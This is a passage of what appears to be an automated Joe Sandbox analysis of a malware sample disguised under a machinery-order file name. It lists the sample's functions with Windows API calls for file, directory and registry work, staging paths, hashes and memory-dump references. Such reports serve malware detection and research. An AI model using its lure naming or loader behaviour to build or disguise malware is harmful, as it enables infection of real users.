                                                                                                                                                                                                                          • Instruction ID: b68841798668a23a4ff443840be3121a405d120f2a8fc72f381fb15ba3c401f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b081aef81ff629f146bbe59bed4ce20841918d67cbec0e6b9b54e24ec9e4470
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72212E72904215FBDF217F648E4DA6E7670AB45318F30423BF301B52D0D7BD49419A6E
                                                                                                                                                                                                                          Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(?,?,Unconsiderately97.gra,?,00405874,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                                                                            • Part of subcall function 004053DC: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs, xrefs: 00401629
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                          • String ID: C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs
                                                                                                                                                                                                                          • API String ID: 1892508949-893828937
                                                                                                                                                                                                                          • Opcode ID: 74df2cec2f7f2bbddf3b219624da823990b40f00be921dfed867a10567afae30
                                                                                                                                                                                                                          • Instruction ID: 033a10bc0c18a89e8a0df43fa9022a024a55b03552da94b7695e97ed969a6887
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74df2cec2f7f2bbddf3b219624da823990b40f00be921dfed867a10567afae30
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD112B35504141ABDF217B650C409BF37B0E9A2325738463FE582B22D2C63C0943A63F
                                                                                                                                                                                                                          Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                                                                                                                                                                                          • Instruction ID: cf83b5f92aa564cc298776c77b2bdd28f1825052710f2ecdbdb4cfcb1c159722
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92A13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                                                                                                                                                                                                          Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                                                                                                                                                                                          • Instruction ID: cdde4d58dff4e4a9c83cf0d0e57cddb7afde41a65112cf45587a3a44971c93cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                                                                                                                                                                                                          Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                                                                                                                                                                                          • Instruction ID: 210b764e34932ffe60d6cfe39aea5744945828095a37428d8e8ad2b7e06fd55b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B814671E04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C7789A96DF44
                                                                                                                                                                                                                          Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                                                                                                                                                                                          • Instruction ID: d8cce1150c04716a98830c198e93b549954248a52dda193404c5f2b9195ff2ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89815771E04228CBDF24CFA8C8447ADBBB1FB44315F1181AED856BB281D7786A96DF44
                                                                                                                                                                                                                          Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                                                                                                                                                                                          • Instruction ID: 258a3fd06c35fad05ca81ab60d081a33c15d1deb970c592860f690c18264f2bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D711271E04228CBDF24CFA8C8547ADBBF1FB44305F15806AD856BB281D7785A96DF44
                                                                                                                                                                                                                          Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                                                                                                                                                                                          • Instruction ID: babde66c8cd488a95ab0ad7164d611a89d90f571a219cc2b865e3b094ddf9d96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28712471E04228CBDF28CFA8C8547ADBBB1FB44305F15816ED856BB281C7785A96DF44
                                                                                                                                                                                                                          Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                                                                                                                                                                                          • Instruction ID: 6cdc3ec63689871e8710e51dd90966e3aca29af0085505062bf66b2ee05b33a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25714571E04228CBDF28CF98C8547ADBBB1FB44305F11806ED856BB281C7786A96DF44
                                                                                                                                                                                                                          Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                                                                                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                                          • Opcode ID: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                                                                                                                                                                                          • Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A
                                                                                                                                                                                                                          Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 100028A7
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 100029AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1214770103-0
                                                                                                                                                                                                                          • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                                                          • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                                                                                                                                          Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                          • Opcode ID: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                                                                                                                                                                                          • Instruction ID: e2c7ba43779b99907ab4ed3cb5240aedb23d0abedd6968282b04b845729cd546
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7119471905205EEDF14DF64C6889AEBBB4EF11349F20843FE542B62C0D2B84A45DA5A
                                                                                                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
